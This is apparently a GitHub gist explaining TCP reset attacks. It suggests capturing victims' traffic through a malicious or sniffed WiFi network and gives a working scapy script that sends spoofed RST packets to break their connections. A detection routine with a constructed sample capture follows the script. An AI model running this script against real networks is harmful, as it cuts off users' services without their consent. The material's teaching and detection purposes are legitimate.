@spinpx
Last active March 1, 2024 17:39
TCP Reset attack in practice #Security #Network

TCP Reset attack

RST (reset) is a flag in the TCP header that indicates the connection is no longer valid. If either of the two participants in a TCP connection sends a packet with the RST flag set, the connection is closed immediately.

This can therefore be used to attack TCP connections: an attacker who knows both parties' IP addresses, ports and the current sequence number of the connection can forge a TCP packet that appears to come from either party.

Given that information, the attack can be used to make particular users fail to use particular TCP-based network services.

In practice, we have to eavesdrop on the victims' communications to obtain their IPs, ports and sequence number. This can be done by:

  • Tricking them into connecting to a malicious WiFi network, or hijacking their communications some other way.
  • Sniffing WiFi packets if they are nearby and using WiFi.

We can filter the TCP packets and find the newest packets of the connection we want to attack.

We then send a TCP packet with the RST flag set, using the source and destination IPs and ports sniffed from the victims. Note that the sequence number increases over the course of a TCP connection: to be accepted, the RST's sequence number must be equal to or larger than the ack value of the latest packet the sender received, and it must fall within the receiver's window. So it has to be updated. To improve the odds of success, we can send many packets with different sequence numbers, each larger than the sniffed ack field.

We can implement the TCP Reset attack with scapy in Python. The code is in tcp-reset.py.

Useful reference:

  • Watson, P.: Slipping in the Window: TCP Reset Attacks (2004)

```python
from scapy.all import IP, TCP, sniff, send

win = 512
tcp_rst_count = 10
victim_ip = "192.168.1.1"
your_iface = "mon0"

# get a tcp packet by sniffing WiFi
t = sniff(iface=your_iface, count=1,
          lfilter=lambda x: x.haslayer(TCP)
          and x[IP].src == victim_ip)
t = t[0]
tcpdata = {
    'src': t[IP].src,
    'dst': t[IP].dst,
    'sport': t[TCP].sport,
    'dport': t[TCP].dport,
    'seq': t[TCP].seq,
    'ack': t[TCP].ack
}
# sweep candidate sequence numbers upward from the sniffed ack, half a window apart
max_seq = tcpdata['ack'] + tcp_rst_count * win
seqs = range(tcpdata['ack'], max_seq, int(win / 2))
# reply direction: swap the sniffed source and destination
p = IP(src=tcpdata['dst'], dst=tcpdata['src']) / \
    TCP(sport=tcpdata['dport'], dport=tcpdata['sport'],
        flags="R", window=win, seq=seqs[0])
for seq in seqs:
    p.seq = seq
    send(p, verbose=0, iface=your_iface)
print('tcp reset attack finish')
```
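As a detection counterpart, here is an added example (not part of the gist) that scans a capture for the signature the loop above leaves behind: a burst of RST segments on one 4-tuple with sequence numbers stepping at a fixed stride. The packet record, thresholds and addresses are assumptions made for this example; it works on plain Python tuples so it runs without scapy.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

class Pkt(NamedTuple):
    ts: float      # capture timestamp in seconds
    src: str
    dst: str
    sport: int
    dport: int
    flags: str     # scapy-style flag string such as "R", "RA" or "PA"
    seq: int

FlowKey = Tuple[str, str, int, int]

def detect_rst_bursts(pkts: List[Pkt], min_rsts: int = 3,
                      window_s: float = 1.0) -> Dict[FlowKey, dict]:
    """Flag 4-tuples that receive several RSTs with differing sequence numbers
    within window_s seconds. A genuine close sends one RST per direction; a
    forged reset that sweeps seq = ack + k*win/2 (as the gist's loop does)
    shows up as a burst of RSTs on one flow, each with a different seq."""
    by_flow: Dict[FlowKey, List[Pkt]] = defaultdict(list)
    for p in pkts:
        if "R" in p.flags:
            by_flow[(p.src, p.dst, p.sport, p.dport)].append(p)
    alerts: Dict[FlowKey, dict] = {}
    for key, rsts in by_flow.items():
        rsts.sort(key=lambda p: p.ts)
        best: List[Pkt] = []
        start = 0
        for end in range(len(rsts)):          # sliding time window
            while rsts[end].ts - rsts[start].ts > window_s:
                start += 1
            if end - start + 1 > len(best):
                best = rsts[start:end + 1]
        seqs = sorted({p.seq for p in best})
        if len(best) >= min_rsts and len(seqs) > 1:
            steps = {b - a for a, b in zip(seqs, seqs[1:])}
            alerts[key] = {"count": len(best),
                           "seq_span": seqs[-1] - seqs[0],
                           "uniform_step": len(steps) == 1}  # fixed stride = scripted sweep
    return alerts

# Constructed sample capture (hypothetical addresses): a normal close with a single
# RST, then one flow hit by ten forged RSTs stepping seq by 256 inside 20 ms.
SAMPLE = [Pkt(0.00, "10.0.0.5", "10.0.0.9", 443, 51000, "PA", 1000),
          Pkt(0.10, "10.0.0.5", "10.0.0.9", 443, 51000, "RA", 1040)]
SAMPLE += [Pkt(1.0 + i * 0.002, "10.0.0.9", "10.0.0.5", 52000, 443, "R", 5000 + i * 256)
           for i in range(10)]
```

Running `detect_rst_bursts(SAMPLE)` reports only the second flow, with ten RSTs spanning 2304 sequence numbers at a uniform stride; the single RST of the normal close is ignored.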